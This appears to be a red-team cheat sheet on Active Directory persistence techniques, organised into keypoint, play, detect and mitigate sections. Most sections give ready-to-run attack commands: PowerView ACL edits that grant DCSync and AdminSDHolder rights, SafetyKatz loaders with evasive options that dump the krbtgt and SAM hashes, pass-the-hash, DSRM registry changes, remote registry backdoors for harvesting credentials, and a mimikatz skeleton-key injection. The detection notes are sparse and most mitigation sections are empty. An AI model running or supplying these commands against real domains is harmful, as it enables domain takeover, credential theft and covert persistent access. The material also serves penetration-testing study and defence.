persist / ad

Technics detailed @ thehacker.recipes / ad / persistence

Menu

• adminsdholder
• dacl-abuse
  • genericall
  • genericwrite
• dc-shadow
• dsrm
• golden-gmsa
• security-descriptors
  • DCOM
  • Powershell
  • Registry
  • SC Manager
  • WMI
• skeleton-key
• ssp-custom

Tools

_repo	_last_pushed	_stars	_watch	_language

adminsdholder

🔑 KEYPOINTS :

• special AD container with some “default” security permissions that is used as a template for protected AD accounts and groups
• roll backs the security permissions for protected accounts and group every 60 minutes, aka the Security Descriptor Propagator Update (SDProp) process.

▶️ PLAY :

# add the user to the adminsdholder group 
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights All
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights ResetPassword
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights WriteMembers

# check the user has genericAll over the 'Domain Admins' group
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}

# add the user back to the 'Domain Admins' group
net group "domain admins" $ztarg_user_name /add /domain
Add-DomainGroupMember -Identity  "domain admins" -Domain $zdom_fqdn -Members $ztarg_user_name

🔎️ DETECT :

# find all users with security ACLs set by SDProp using the PowerShell AD cmdlets
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))” -Properties MemberOf,Created,Modified,AdminCount

# monitor the ACLs configured on the AdminSDHolder object. These should be kept at the default – it is not usually necessary to add other groups to the AdminSDHolder ACL.

# monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by SDProp.

🛟 MITIGATE :

🕮 READ MORE at :

• thehacker.recipes/ad/persistence/adminsdholder.
• ired.team/abuse-adminsdholder
• adsecurity.org/adminsdholder

dacl-abuse

🔑 KEYPOINTS :

• /discov/ad#shoot-dacl

genericall

▶️ PLAY :

######         DCSYNC               #############
# 01 # as DA add dcsync rights to a low-level user
# 'Replicating Directory Change', 'Replicating Directory Change All' over the 'Domain' object
Add-DomainObjectAcl -TargetIdentity $zdom_dn -PrincipalIdentity $ztarg_user_name -Rights DCSync -PrincipalDomain $zdom_fqdn -TargetDomain $zdom_fqdn -Verbose
# 02 # run a DCsync attack # TO DEBUG $zargs
#$zbnss=""
$ztarg_user_name="krbtgt"
$zx=$znbss+"\"+$ztarg_user_name
$args='"lsadump::evasive-dcsync /user:'+ $zx + '" "exit"'
.\Loader.exe -path .\SafetyKatz.exe -args $args

🔎️ DETECT :

• bloodhound.readthedocs.io / edge / dcsync

🛟 MITIGATE :

# user added to privileged group

# shadow credentials
msDS-KeyCredentialLink

genericwrite

######         DCSYNC               #############

🕮 READ MORE at :

• thehacker.recipes/ad/movement/dacl.
• thehacker.recipes/ad/persistence/dacl.
• ired.team/abusing-active-directory-acls-aces

dc-shadow

🔑 KEYPOINTS :

• tbd

▶️ PLAY :

🔎️ DETECT :

🛟 MITIGATE :

🕮 READ MORE at :

• thehacker.recipes/ad/persistence/dcshadow.
• ired.team/dcshadow

dsrm

🔑 KEYPOINTS :

• DSRM stands for ‘Directory Services Restore Mode’
• allows remote access to the DC for the local admin accounts
• dump of local admins hash is required + activation of the feature in the registry

▶️ PLAY :

# 01 # on DC dump from LSASS $zdom_dc_admin_nthash
C:\Users\Public\Loader.exe -path .\SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"

# 020 # check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior 

# 021 # create key with value "2" if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD 

# 022 # change value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  

# 03 # PTH with zdom_dc_admin_nthash
 C:\Users\Public\Loader.exe -Path .\SafetyKatz.exe "sekurlsa::evasive-pth /domain:${zdom_dc} /user:Administrator /ntlm:${zdom_dc_admin_nthash} /run:cmd.exe" "exit"

🔎️ DETECT :

# EID: 4657 - Registry value modified
# EID: 12 - Registry Object Created/Deletion (sysmon)

🛟 MITIGATE :

🕮 READ MORE at :

• hacktricks.xyz/dsrm-credentials

golden-gmsa

🔑 KEYPOINTS :

• Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation
• password are computed based on KDS root keys + gMSA account ‘msDS-ManagedPassword’ attribute value
• hack implemented by semperis/goldenGMSA tool

▶️ PLAY :

# enumerate KDS root keys,  SID, RootKeyGuid, Password ID
GoldenGMSA.exe gmsainfo

# enumeration for a single gMSA
GoldenGMSA.exe gmsainfo --sid "S-1-5-21-[...]1586295871-1112"

🔎️ DETECT :

🛟 MITIGATE :

🕮 READ MORE at :

• thehacker.recipes/ad/persistence/goldengmsa.
• trustedsec

security-descriptors

🔑 KEYPOINTS :

▶️ PLAY :

DCOM

• DEMO DCOM backdoor

# set-RemoteDCOM

Powershell

# grant PS remote execution to a user
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose

# remove the grant of PS remote execution
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose -Remove

Registry

• DEMO remote registry

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName $zdom_dc_name -Trustee $ztarg_user_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName $zdom_dc_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName $zdom_dc_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName $zdom_dc_name -Verbose

🔎️ DETECT :

# changes to DC registry keys
SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
SYSTEM\CurrentControlSet\Control\LSA\JD
SYSTEM\CurrentControlSet\Control\LSA\Skew1
SYSTEM\CurrentControlSet\Control\LSA\Data
SYSTEM\CurrentControlSet\Control\LSA\GBG

SC Manager

• DEMO SCM backdoor / service creation

WMI

• DEMO WMI backdoor

# grant WMI remote execution to a user
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Verbose

# remove the grant of WMI remote execution
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Remove -Verbose

🕮 READ MORE at :

• hacktricks/security-descriptors
• edemilliere / Invoke-ADSDPropagation

skeleton-key

🔑 KEYPOINTS :

• hack that injects a master password into the lsass process on a DC
• enables the adversary to authenticate as any user without password
• does not persist to reboot

▶️ PLAY :

# execution on a DC
invoke-mimi 'misc::skeleton'

🔎️ DETECT :

🛟 MITIGATE :

🕮 READ MORE at :

• thehacker.recipes/ad/persistence/skeleton-key.

ssp-custom